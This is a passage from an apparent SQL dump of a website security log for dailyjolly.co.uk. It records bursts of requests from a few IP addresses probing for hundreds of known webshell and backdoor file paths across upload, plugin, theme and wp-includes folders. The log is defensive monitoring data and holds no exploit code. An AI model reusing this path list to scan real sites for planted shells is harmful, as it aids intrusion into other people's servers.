9267,55,'ekwJyu85OLbKoYiAr26mFsfT','','19|0|0|0|www.dailyjolly.co.uk/a.php',0,19,0),('20.14.84.163',336483491,'',0,1674339908.8938,55,'XteqbmFZu78Qh1lRTVonjBIH','','19|0|0|0|www.dailyjolly.co.uk/b.php',0,19,0),('20.14.84.163',336483491,'',0,1674339909.8829,55,'fjKLwbTnP4ACFBezEa71M5t9','','19|0|0|0|www.dailyjolly.co.uk/c.php',0,19,0),('20.14.84.163',336483491,'',0,1674339910.8096,55,'6XdiTt1MrZBxaNhSE20Yykj3','','19|0|0|0|www.dailyjolly.co.uk/wp.php',0,19,0),('20.14.84.163',336483491,'',0,1674339911.8154,55,'T4znJ8yRwC7dU1xYkp2FAQHK','','19|0|0|0|www.dailyjolly.co.uk/mar.php',0,19,0),('20.14.84.163',336483491,'',0,1674339912.8011,55,'6wdmpfyAHsBco4MFgjOzkv5C','','19|0|0|0|www.dailyjolly.co.uk/p.php',0,19,0),('20.14.84.163',336483491,'',0,1674339913.8036,55,'BYp1WErgVRD95FPAHzo3atTv','','19|0|0|0|www.dailyjolly.co.uk/t.php',0,19,0),('20.14.84.163',336483491,'',0,1674339914.7545,55,'zVuCidqfjLng7l2HAKUDPoFT','','19|0|0|0|www.dailyjolly.co.uk/o.php',0,19,0),('20.14.84.163',336483491,'',0,1674339915.7234,55,'pEiPaS7GeLlcnIMywtvoAqgN','','19|0|0|0|www.dailyjolly.co.uk/w.php',0,19,0),('20.14.84.163',336483491,'',0,1674339916.7220,55,'ebHBNMK21hv3O4QnuToqsRAC','','19|0|0|0|www.dailyjolly.co.uk/confiig.php',0,19,0),('104.243.43.10',1760766730,'',0,1674341797.9877,55,'PBnFVKAqTazEcZJOp7j2mUs8','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php',0,19,0),('104.243.43.10',1760766730,'',0,1674341799.1049,55,'e8URazVs5Z01TpQHPENwCqif','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php',0,19,0),('104.243.43.10',1760766730,'',0,1674341800.4510,55,'Q4FGTgsVILf8My9RiHj26eXa','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/seotheme/mar.php',0,19,0),('104.243.43.10',1760766730,'',0,1674341801.9647,55,'7GO3qcWnCzHkiIytgK0UjDA6','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php',0,19,0),('104.243.43.10',1760766730,'',0,1674341802.4110,55,'q0dJ8iWblU2sGjvQu9P6pTm1','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/alera/alpha.php',0,19,0),('104.243.43.10',1760766730,'',0,1674341802.5287,10,'q0dJ8iWblU2sGjvQu9P6pTm1','','707|0|0|0|www.dailyjolly.co.uk/wp-content/themes/alera/alpha.php',0,707,0),('104.243.43.10',1760766730,'',0,1674341802.9508,100,'QVJ0mWcxECog8RKFvIGX93HN','','13|0|0|0|www.dailyjolly.co.uk/wp-commentin.php',0,13,0),('104.243.43.10',1760766730,'',0,1674341803.3610,100,'laU9d8ZOPhzkf1W0KIMXTeji','','13|0|0|0|www.dailyjolly.co.uk/wp/wp-commentin.php',0,13,0),('104.243.43.10',1760766730,'',0,1674341803.7752,100,'oX4rIS5GBR1VZA2sFH7eNQ9p','','13|0|0|0|www.dailyjolly.co.uk/wordpress/wp-commentin.php',0,13,0),('104.243.43.10',1760766730,'',0,1674341804.1736,100,'sBYIKl5pU3JhzeWCjxgdLbvn','','13|0|0|0|www.dailyjolly.co.uk/blog/wp-commentin.php',0,13,0),('104.243.43.10',1760766730,'',0,1674341804.5352,100,'CQyaDhARVI4qjvGnL1TZkBuP','','13|0|0|0|www.dailyjolly.co.uk/site/wp-commentin.php',0,13,0),('167.172.248.229',2813130981,'',0,1674344546.5822,55,'wqtGsK2rc1IE063zjnfHkDOP','','19|0|0|0|www.dailyjolly.co.uk/.well-known/freshtools.net.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344546.9168,55,'EZ8bpq5AuU4GghilcarVSnzL','','19|0|0|0|www.dailyjolly.co.uk/.well-known/gindex.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344547.2416,55,'xsD5I0VGYojAmy1F2CUW4BcK','','19|0|0|0|www.dailyjolly.co.uk/.well-known/img.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344547.6129,55,'XPQLyHpOneCjc3ZUotuAGWV4','','19|0|0|0|www.dailyjolly.co.uk/.well-known/seo.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344547.9360,55,'vgQmHuSIrG7lJ48KpeEdUFqz','','19|0|0|0|www.dailyjolly.co.uk/.well-known/subirfoto.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344547.9605,10,'vgQmHuSIrG7lJ48KpeEdUFqz','','707|0|0|0|www.dailyjolly.co.uk/.well-known/subirfoto.php',0,707,0),('167.172.248.229',2813130981,'',0,1674344548.3281,55,'Zg39QT8O2fJjmhwx6aUiR0uM','','19|0|0|0|www.dailyjolly.co.uk/.well-known/acme-challenge/licsy.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344548.6940,55,'gNy7rEMUH3tsnSQT2qmzFAf9','','19|0|0|0|www.dailyjolly.co.uk/.well-known/acme-challenge/makeasmtp.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344549.1659,50,'TdtMpcjb5Lkr40SfUJgZYoxG','','10|0|0|0|www.dailyjolly.co.uk/.well-known/acme-challenge/wp-signup.php',0,10,0),('167.172.248.229',2813130981,'',0,1674344549.1696,55,'TdtMpcjb5Lkr40SfUJgZYoxG','','19|0|0|0|www.dailyjolly.co.uk/.well-known/acme-challenge/wp-signup.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344549.5234,55,'q82fT5GsER4AnB7DLQVm1xhO','','19|0|0|0|www.dailyjolly.co.uk/.well-known/pki-validation/%20.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344549.9772,55,'S2YM1sCVk0RtuzpyGaJLhfX5','','19|0|0|0|www.dailyjolly.co.uk/.well-known/pki-validation/bala.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344550.3651,55,'vXt0CYBme2AL5yrKQzWJ1M6F','','19|0|0|0|www.dailyjolly.co.uk/.well-known/pki-validation/p.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344550.7152,55,'vsnWQ8xrTJ3uf0AUjpKGPhk5','','19|0|0|0|www.dailyjolly.co.uk/.well-known/pki-validation/psp.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344551.0579,55,'yOn0UevLQ5BRSKW1NdVF7IfY','','19|0|0|0|www.dailyjolly.co.uk/.well-known/pki-validation/sdf-dffg.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344551.3978,50,'FRExWlQGpaDdXqjmVAKki6wY','','10|0|0|0|www.dailyjolly.co.uk/.well-known/pki-validation/wp-signup.php',0,10,0),('167.172.248.229',2813130981,'',0,1674344551.4326,55,'FRExWlQGpaDdXqjmVAKki6wY','','19|0|0|0|www.dailyjolly.co.uk/.well-known/pki-validation/wp-signup.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344551.7869,55,'G3We0OmStNZHLvX7jdwcru4I','','19|0|0|0|www.dailyjolly.co.uk/.well-known/pki-validation/z88x/0z.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344552.1521,55,'CXPda56AYVNjKzg91liIfRtk','','19|0|0|0|www.dailyjolly.co.uk/admin/add_modal.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344552.5189,55,'aGkSCyjfKBXcQLeJn4zgPE1i','','19|0|0|0|www.dailyjolly.co.uk/admin/adminedit.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344552.8669,55,'WdmwNvi0FC8yU6rM1uzJ7IO9','','19|0|0|0|www.dailyjolly.co.uk/admin/editProject.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344553.1998,55,'6SkxQ1y8E0Le4MRhqJrbNIvB','','19|0|0|0|www.dailyjolly.co.uk/admin/index_upload.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344553.6132,55,'98cTuz2VxCEhA4dPFU1BoZ3k','','19|0|0|0|www.dailyjolly.co.uk/admin/reg_referencia.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344554.0008,55,'cqNpKhdCRvuL7e2AJygfQPWT','','19|0|0|0|www.dailyjolly.co.uk/admin/bak/UploadPic.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344554.3638,55,'tzN6VOklpPJmsCr2wjITZqG4','','19|0|0|0|www.dailyjolly.co.uk/admin/editor/assetmanager/assetmanager.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344554.7377,55,'ZiFoEB7Cpu1XyljRc38bnQzV','','19|0|0|0|www.dailyjolly.co.uk/assets/css/ENKI.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344555.1045,55,'jTQD0lEb4umr9eCnKPvaMzOh','','19|0|0|0|www.dailyjolly.co.uk/assets/filemanager/dialog.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344555.4456,55,'Sjre28KLBF7qNTPHJCRxiwMW','','19|0|0|0|www.dailyjolly.co.uk/assets/images/images.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344555.8222,55,'a9fAOHGdgsVw3hDmuB4p7kFy','','19|0|0|0|www.dailyjolly.co.uk/files/auto1.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344556.1571,55,'FskGA1MXabJ3qReztOBfnoSc','','19|0|0|0|www.dailyjolly.co.uk/files/ban.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344556.5160,55,'HaM0hVjQoTWLxZiblq2P97N3','','19|0|0|0|www.dailyjolly.co.uk/files/cons.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344556.8589,55,'FXe5OWnwtP4dHj3yhAfCSQKk','','19|0|0|0|www.dailyjolly.co.uk/files/galeria.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344557.1738,55,'NsMdkDf1wBZveplTELt7aqb2','','19|0|0|0|www.dailyjolly.co.uk/files/upload.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344557.5463,55,'qYOrARiZhcf6GDsoygEtk0H3','','19|0|0|0|www.dailyjolly.co.uk/images/1U.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344557.8539,55,'iqQhZ0jrFP63K7fz5GIpeRtJ','','19|0|0|0|www.dailyjolly.co.uk/images/css.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344558.1928,55,'Um6BXJGcvKsVRrDY7kjfno2g','','19|0|0|0|www.dailyjolly.co.uk/images/domat.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344558.5329,55,'lFceRsBjKX13ODQr8Uf5SbEd','','19|0|0|0|www.dailyjolly.co.uk/images/eee.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344558.8687,55,'JByxUgdsZeqFoIR8jD9haMC4','','19|0|0|0|www.dailyjolly.co.uk/images/ET0O.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344559.1983,55,'rR0cKboOiCTvU5WJZDGXtP9j','','19|0|0|0|www.dailyjolly.co.uk/images/formulier.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344559.5149,55,'sUdBkpcRoPq6jQf2OCSGutHA','','19|0|0|0|www.dailyjolly.co.uk/images/h[1].php',0,19,0),('167.172.248.229',2813130981,'',0,1674344559.8378,55,'yX6rb5dxtmGivksSWRBIYJ1H','','19|0|0|0|www.dailyjolly.co.uk/images/idpago.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344560.1797,55,'TbVDIKNxOHBt2ihuWJzYc4yj','','19|0|0|0|www.dailyjolly.co.uk/images/images.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344560.5390,55,'17DUY5GaOCXo0jtFmQSAvJ98','','19|0|0|0|www.dailyjolly.co.uk/images/imagrer.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344560.8865,55,'ekpOrS09uh2FcUd8qHijGM5P','','19|0|0|0|www.dailyjolly.co.uk/images/inbox.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344561.2124,55,'ybM3ZCfHzBQRwaS6O2dciV5E','','19|0|0|0|www.dailyjolly.co.uk/images/include.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344561.5289,55,'fi1rEFRpU5kxsqWMjmhdZACN','','19|0|0|0|www.dailyjolly.co.uk/images/index.blade.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344561.8894,55,'7eMOYKwiD0tT2ZbaX69jnxB4','','19|0|0|0|www.dailyjolly.co.uk/images/index2.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344562.2102,55,'XjyfN5YMl4zJnehISDq39o1s','','19|0|0|0|www.dailyjolly.co.uk/images/iupload.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344562.6411,55,'hkHabgFSTi0u16lUeG4xV5Ep','','19|0|0|0|www.dailyjolly.co.uk/images/Logo_mm.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344563.0096,55,'CUWYrjgbI1Bw2cF7QpiHLN6n','','19|0|0|0|www.dailyjolly.co.uk/images/m.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344563.3637,55,'kcoQpPLB3sHt1OVf0RnNb7MC','','19|0|0|0|www.dailyjolly.co.uk/images/Marvins.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344564.0140,55,'cNC4jDGBwFsh6A0QRElyYiom','','19|0|0|0|www.dailyjolly.co.uk/images/membernew.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344564.3702,55,'gFy3EodnKlSQhiWJV7ajx1f9','','19|0|0|0|www.dailyjolly.co.uk/images/ms-add-pro-photo.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344564.7407,55,'nHCgkaGmsqMoSWhNv18c50Qf','','19|0|0|0|www.dailyjolly.co.uk/images/newa.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344565.0888,55,'I5kQrSbBxMpJ7W2XDnHCR8la','','19|0|0|0|www.dailyjolly.co.uk/images/phpimage.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344565.4358,55,'iTVDkZjuJgB7xIP6dvFyqcsf','','19|0|0|0|www.dailyjolly.co.uk/images/pluginfotos.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344565.8768,55,'4vi6PfyKUH8S5OqmCzl7GtgB','','19|0|0|0|www.dailyjolly.co.uk/images/productos_img_edit.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344566.2585,55,'SJpLxMaGCiDrqZ1IRsyfwY8b','','19|0|0|0|www.dailyjolly.co.uk/images/reg_form.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344566.7213,55,'XIcmbuKSfg52dy6VjUlxA1Ya','','19|0|0|0|www.dailyjolly.co.uk/images/sagafif.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344567.1918,55,'MokZbWYSEFRtGfpQ1UBzOlv0','','19|0|0|0|www.dailyjolly.co.uk/images/sendme.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344567.5578,55,'B8UbgFja6fEGS1V2N0IYprcL','','19|0|0|0|www.dailyjolly.co.uk/images/sfm.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344567.8895,55,'3NB7Kh4dZLCeug0qSk6x1HtO','','19|0|0|0|www.dailyjolly.co.uk/images/test_upload.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344568.2209,55,'s8ChJeZbxcL1oMfAYF42KRGI','','19|0|0|0|www.dailyjolly.co.uk/images/unzip.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344568.5680,55,'DY4zHdSv7xEtBiJ6fyMAOkwn','','19|0|0|0|www.dailyjolly.co.uk/images/up.pdf.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344568.9343,55,'JK39AnHQXErtL7ePGblFdjcT','','19|0|0|0|www.dailyjolly.co.uk/images/upload_submition.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344569.2810,55,'3BeRKx0oHpEvGzADlnYJfVtZ','','19|0|0|0|www.dailyjolly.co.uk/images/uu_file_upload.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344569.5911,55,'0RPgV6XYremAcvJNQId4GM5B','','19|0|0|0|www.dailyjolly.co.uk/images/add-actualites.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344569.9505,55,'IWnG41cYuhStrPZv6X3LTO0E','','19|0|0|0|www.dailyjolly.co.uk/images/alumini/9227_a.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344570.2962,55,'Cn6qUhIp13e9VTGoJKARzuxE','','19|0|0|0|www.dailyjolly.co.uk/images/headers/readme.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344570.6082,55,'qvZmNa6i9z1ewjYdEMc0DFCg','','19|0|0|0|www.dailyjolly.co.uk/images/images.phtml',0,19,0),('167.172.248.229',2813130981,'',0,1674344570.9249,55,'UbzsXLnfE0Z1cWMmu8hKwHvR','','19|0|0|0|www.dailyjolly.co.uk/upload/addProduct.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344571.2490,55,'cew5y0b3EuKRNMpnj4WktqTI','','19|0|0|0|www.dailyjolly.co.uk/upload/dir.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344571.5718,55,'tvDau7fcyxd43U2wsYn5WBFm','','19|0|0|0|www.dailyjolly.co.uk/upload/fud1.php.jpg',0,19,0),('167.172.248.229',2813130981,'',0,1674344571.9052,55,'xG0EUvuSjAoK7NbDPYstcqe1','','19|0|0|0|www.dailyjolly.co.uk/upload/upload.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344572.2454,55,'ONG43iRYpBgFe7Tztr8W1XEc','','19|0|0|0|www.dailyjolly.co.uk/upload/vvvindex.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344572.5798,55,'sjPcAFKvmua8OZMEn6SkVGdI','','19|0|0|0|www.dailyjolly.co.uk/upload/file/zup.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344572.9479,55,'BJhTKOGjR6ZvLCi5lmk72aVb','','19|0|0|0|www.dailyjolly.co.uk/upload/petit/fm.php.gif',0,19,0),('167.172.248.229',2813130981,'',0,1674344573.2809,55,'qYtBHp2WK7MjilyC1FXQw3xA','','19|0|0|0|www.dailyjolly.co.uk/upload/project/prv.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344573.6057,55,'5WqRuJr41BlkO2AKTDgZcyH0','','19|0|0|0|www.dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/as.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344573.9332,55,'ojZdUJigGvFxQa1IODEPbfrp','','19|0|0|0|www.dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/shell.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344574.2707,55,'SytKQpZLn9bAU1aTuhzg0wf4','','19|0|0|0|www.dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/z7.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344574.5961,55,'LFD9z8WUiy7ae0JZOT5HsYxj','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/module.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344574.9354,55,'WNcaRSb4tUKd9uPjgJn3Z7F2','','19|0|0|0|www.dailyjolly.co.uk/wp-content/a.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344575.2591,55,'pk9SOvN8YtXRI71x3onJeU2q','','19|0|0|0|www.dailyjolly.co.uk/wp-content/AronTn.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344575.5796,55,'jf20XtJKe8BG5uSnspIT4dvM','','19|0|0|0|www.dailyjolly.co.uk/wp-content/core.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344575.9174,55,'ylP4ABDdFrvTUxSON6sLG7mz','','19|0|0|0|www.dailyjolly.co.uk/wp-content/languages/admin-network-ru_RU.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344576.2636,55,'VZTy9hC2btpRYNsMkg3POqB5','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/clientprofile/mediagallery.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344576.5954,55,'jJBm0bGutDk4fWQl8i1UM7sx','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/db-toolkit/dbtoolkit_import.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344576.9246,55,'qQKFTd57EkgwJiZHI8nBCUMv','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/errynclkzk/dadwehyzpf.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344577.2726,55,'kamWTMu0EBR1HOtX2je3yxGF','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/hello-dolly/install.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344577.6396,55,'AWF9Y8NT1LUD0wrJyejXOZz7','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/wp-symetrio/schedule-symetrio.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344577.9943,55,'ow7mBjvIDbaLFHZd0MAPn6xC','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/intigo-child/ptm-import.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344578.3243,55,'SZHY4CpaUuzMWfmAiThgqxVR','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/wp-content/uploads/mc4wp-debug-log.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344578.6538,55,'bTfOPLwAIXM59uWxnKR7NdUZ','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/2012/str_pad.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344578.9853,50,'6K82ZiMsPGvQANwutjcTEVa7','','10|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/2016/wp-signup.php',0,10,0),('167.172.248.229',2813130981,'',0,1674344578.9957,55,'6K82ZiMsPGvQANwutjcTEVa7','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/2016/wp-signup.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344579.3565,55,'aFkfPWrADHu8cNtKXbIzwRJm','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/2018/wp-conflg.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344579.7127,50,'SvzJ5LcUZCkDya9tVG8pfWFq','','10|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/2021/wp-signup.php',0,10,0),('167.172.248.229',2813130981,'',0,1674344579.7164,55,'SvzJ5LcUZCkDya9tVG8pfWFq','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/2021/wp-signup.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344580.1514,55,'IyJnwxG3V1AeYk8utg7Wdzrh','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/2022/1wiki.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344580.4820,55,'ak1m8iUgTJvpEfl20jLexN6Y','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/2022/checkbox.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344580.8505,55,'rszp8X6TKaqkS345ocfDNUhY','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/2022/data-user.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344581.1912,55,'7HjTuGZQWX3pUIYxcr4C5ywt','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/2022/wp-conflg.php.suspected',0,19,0),('167.172.248.229',2813130981,'',0,1674344581.5029,55,'s26NSLVE5FcqZvaCUQPlYJdp','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/3ponu.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344597.0780,55,'h4lE8NtgbALi0unKT725Mzoa','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/batm.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344597.4031,55,'NHXs1gbojwxi3qOeLFhfzM2k','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/bg_info.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344597.7703,55,'WLkSveUuRjwKFm4i80IbZVg1','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/bulk.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344598.1304,55,'PCSZfoB7As6Lgm30VbGTdeWE','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/bypass.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344599.0770,55,'ghvs8k0TRPJzQ2GqNaMWDxtC','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/dokumenty/about.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344599.4340,55,'5KDknPQ6avJjigye7ZGhX0lI','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/external_feed.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344599.7790,55,'NuVEFe7HDjvLKhM93wJdzr2B','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/help.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344600.1024,55,'tY79zKDNZEIceBJjhlwoVqH6','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/ipc9z9.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344600.4431,55,'Gzd7UZsxq4HAXvBMiEkToWmu','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/js.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344600.7773,55,'EAnCVBP2MglU6IWmpjLQ1e5Y','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/krop.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344601.1666,55,'P20Caswv9fEjW5JZ1q3oFOiG','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/l.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344601.5216,55,'Yuf4Lqc8dymrhOUCzgA2iTp3','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/mail.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344601.8416,55,'7eEfdPhxuLnKtJ2yB5praSc6','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/mindex2.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344602.2046,55,'eAJ7VbKaQ5fh2G6u8q4dtUBT','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/old.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344602.5679,55,'rKgGkej0zCbmRAnFZad6iIov','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/shwso.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344602.9291,55,'9uAtB3ngZLsqYN8lkOEM5RCF','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/uigen_2016/gaxa1.php.jpg',0,19,0),('167.172.248.229',2813130981,'',0,1674344603.3018,55,'Dn1v4g9wJy0oYSPa78W5pd3z','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/up.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344603.7866,55,'cj8RfpJ7sXhbHGyN15i6MzCa','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/wp-logout.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344604.1498,55,'sMG24zRXSmCExVJiYTdrpcBo','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/wp-xmlrpc.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344604.4957,55,'VSjBIJde1U0rAOwtzQbxuNo7','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/0aa.php.suspected',0,19,0),('167.172.248.229',2813130981,'',0,1674344604.8725,55,'D4T37leovNmMaqjGAW16ExKY','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/24.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344605.2160,55,'oHwGl8nZdm5pDy2Uibfz0NE6','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/414lfv.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344605.5401,55,'nlp9o6aF2RvbVJI03HmX1gEq','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/a57bze8931.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344605.8676,55,'xrb2M8D6Y9OBvimGLuIygSfQ','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/all.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344606.1957,55,'qI4TmPeOjsH8urzS6DiQxWYG','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/array_reduce.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344606.4991,55,'LMAjxq0dQc3tKC2NWsa7P59Z','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/back.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344606.8501,55,'y9m0I7wkOsChAUTN2LcMRlSQ','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/block-line.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344607.1661,55,'OHn4vgQMbJNDRZ9VcSd2rkq6','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/cache-core.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344607.5017,55,'pN8SHgU5td3Kvl2hVLiITMJ0','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/category-template-core.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344607.8267,55,'zG8PJ7kacdTUViyIC6O1BlFs','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/class-feed-ajax.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344608.1835,55,'ojQc3tDZx6mCTUP2NvkJ1MWh','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/class-join.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344608.5127,55,'zKDwRrQf0l2Svmb6UNJtWkCM','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/class-phpmailer-stream.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344608.9117,55,'20jRsnTgyB31zFXKQed7qP